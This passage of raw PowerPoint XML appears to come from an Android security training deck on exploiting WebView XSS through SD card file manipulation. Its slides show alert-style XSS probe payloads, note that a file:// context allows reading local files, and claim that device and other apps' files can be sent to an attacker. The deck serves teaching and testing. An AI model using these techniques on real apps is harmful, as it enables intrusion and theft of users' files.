              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>data files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>System files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, as long as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> have permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> apps to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> apps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, as long as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> have permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, the location </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>needs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>needs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> to the SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Methodology-wise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>looking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>answer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> questions:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>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657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3B3EAB6B-388D-CC0C-3493-064AB0FD2300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2769705861"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="418729" y="1396999"/>
          <a:ext cx="8194047" cy="4220030"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2307054">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4069633814"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3718560">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2506975677"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2168433">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2845320681"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="711460">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-FR" sz="1600" b="1" dirty="0"/>
                        <a:t>Question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984343"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1754285">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Can we also run arbitrary</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>JavaScript?</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44444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>img</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>src</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="880000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>onerror</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="880000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>alert(1)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt; </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                      </a:br>
                      <a:endParaRPr lang="en-FR"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Yes!</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827189"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1754285">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>If so, under what context is</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>JavaScript executed?</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44444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>script</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;alert(location)&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>script</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt; </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                      </a:br>
                      <a:endParaRPr lang="en-FR"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t>Context</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>: file://</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Privileged Context</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Not protected with the Same Origin Policy, we can read local files!</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810822"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15156164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3B3EAB6B-388D-CC0C-3493-064AB0FD2300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="505706025"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="418729" y="1396999"/>
          <a:ext cx="8194047" cy="2465745"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2307054">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4069633814"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3135086">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2506975677"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2751907">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2845320681"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="711460">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-FR" sz="1600" b="1" dirty="0"/>
                        <a:t>Question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984343"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1754285">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>If XSS from a privileged context, can we read phone files and send them to the attacker?</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Use payload from slide n° </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>108</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                      </a:br>
                      <a:endParaRPr lang="en-FR"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Yes! We can read app files,</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>internal device files and</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>files from other apps!</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827189"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39939910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XSS via SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>recall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>earlier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> in "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Storage"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>speak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> for "the SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to the SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
